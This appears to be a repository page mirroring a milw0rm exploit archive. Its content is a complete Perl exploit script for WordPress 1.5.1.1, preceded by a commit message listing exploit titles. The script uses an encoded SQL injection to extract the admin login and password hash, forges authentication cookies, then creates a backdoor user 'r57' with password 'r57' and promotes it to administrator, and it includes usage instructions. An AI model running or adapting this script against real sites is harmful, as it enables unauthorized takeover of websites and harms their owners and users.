477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
112 lines
3.6 KiB
Perl
Executable file
112 lines
3.6 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
|
|
## WordPress <= 1.5.1.1 sql injection "add new admin" exploit
|
|
## by RST/GHC , http://rst.void.ru , http://ghc.ru
|
|
## coded by 1dt.w0lf
|
|
|
|
use LWP::UserAgent;
|
|
use Getopt::Std;
|
|
use HTTP::Cookies;
|
|
use Digest::MD5 qw(md5_hex);
|
|
getopts('h:p:');
|
|
|
|
$path = $opt_h;
|
|
$pref = $opt_p || 'wp_';
|
|
|
|
if(!$path) { usage(); }
|
|
|
|
$xpl = LWP::UserAgent->new() or die;
|
|
&header();
|
|
print " +---[x] STEP 1 - TRY GET ADMIN INFO\n";
|
|
$reg = $path;
|
|
$reg .= '?%63%61%74=%36%36%36%20%75%6E%69%6F%6E%20%73%65%6C%65%63%74%20%36%36%36%2C%63%6F%6E'.
|
|
'%63%61%74%28%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29%2C%75%73%65%72%5F%6C%6F%67%69'.
|
|
'%6E%2C%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29%2C%75%73%65%72%5F%70%61%73%73%2C%63'.
|
|
'%68%61%72%28%35%38%2C%35%38%2C%35%38%29%29%2C%6E%75%6C%6C%2C%6E%75%6C%6C%2C%6E%75%6C'.
|
|
'%6C%20%66%72%6F%6D%20'.$pref.'%75%73%65%72%73%20%57%48%45%52%45%20%49%44=1'; ### 1 - admin ID
|
|
$res = $xpl->get($reg);
|
|
die "ERROR : ", $res->status_line unless $res->is_success;
|
|
if($res->content =~ m/(?::::)(.*)(?::::)([a-f0-9]{32})(?::::)(<\/title>)/)
|
|
{
|
|
$login = $1; $hash = $2;
|
|
print "\n>> LOGIN : $login\n>> HASH : $hash\n\n";
|
|
}
|
|
else { print "ERROR : Forum not vulnerable or bad prefix."; exit(); }
|
|
|
|
$cookie_jar = HTTP::Cookies->new();
|
|
($cpath = $path) =~ s!/$!!;
|
|
$hash = md5_hex($hash);
|
|
($host = $cpath) =~ s!http://([^/]*).*!$1!;
|
|
$cpath = md5_hex($cpath);
|
|
|
|
$xpl->cookie_jar( $cookie_jar );
|
|
|
|
$cookie_jar->set_cookie( "0","wordpresspass_$cpath","$hash","/",$host,,,,,);
|
|
$cookie_jar->set_cookie( "1","wordpressuser_$cpath","$login","/",$host,,,,,);
|
|
print " +---[x] STEP 2 - CREATE NEW USER\n";
|
|
$reg = $path;
|
|
$reg .= 'wp-admin/users.php';
|
|
$res = $xpl->post("$reg",
|
|
{
|
|
"action" => "adduser",
|
|
"user_login" => "r57",
|
|
"firstname" => "RST",
|
|
"lastname" => "GHC",
|
|
"email" => "billy\@microsoft.com",
|
|
"uri" => "http://rst.void.ru",
|
|
"pass1" => "r57",
|
|
"pass2" => "r57",
|
|
"adduser" => "Submit",
|
|
},
|
|
Referer => $reg
|
|
);
|
|
print " +---[x] STEP 3 - GET ID OF NEW USER\n";
|
|
$reg = $path;
|
|
$reg .= 'wp-admin/users.php';
|
|
$res = $xpl->get("$reg",Referer => $reg);
|
|
@res = split(/\n/,$res->content);
|
|
$id = 0;
|
|
for(@res)
|
|
{
|
|
if(/(?:\<td align=\'center\'\>)([0-9]*)(?:\<\/td\>)/) { $id = $1; }
|
|
if(/\<td\>\<strong\>r57\<\/strong\>\<\/td\>/) { last; }
|
|
}
|
|
die "ERROR : ", $res->status_line unless $res->is_success;
|
|
if($id != 0) { print "\n>> ID : $id\n\n"; }
|
|
else { print "[-] ERROR : CAN'T GET NEW USER ID\n"; exit(); }
|
|
print " +---[x] STEP 4 - LEVEL UP FOR NEW USER\n\n";
|
|
$reg = $path;
|
|
$reg .= 'wp-admin/users.php?action=promote&id='.$id.'&prom=up';
|
|
for($i=0;$i<10;$i++)
|
|
{
|
|
print ">> LEVEL UP # $i\n";
|
|
$res = $xpl->get("$reg",Referer => $reg);
|
|
die "ERROR : ", $res->status_line unless $res->is_success;
|
|
}
|
|
print "\nTHATS ALL. NOW YOU CAN LOGIN WITH USERNAME 'r57' AND PASSWORD 'r57'\n";
|
|
|
|
sub usage()
|
|
{
|
|
&header();
|
|
print "USAGE : r57wp.pl [OPTIONS]\n";
|
|
print "\noptions:\n\n";
|
|
print "-h [path]\n";
|
|
print " Path to wordpress installed\n";
|
|
print "-p [prefix] (optional)\n";
|
|
print " Database tables prefix (default 'wp_')\n\n";
|
|
print "e.g.: r57wp.pl -h http://blah.com/wordpress/\n";
|
|
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
|
|
print "(c)oded by 1dt.w0lf\n";
|
|
print "RST/GHC\n";
|
|
print "http://ghc.ru\n";
|
|
print "http://rst.void.ru\n";
|
|
exit();
|
|
}
|
|
sub header()
|
|
{
|
|
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
|
|
print " WordPress 1.5.1.1 exploit \n";
|
|
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
|
|
}
|
|
|
|
# milw0rm.com [2005-06-21]
|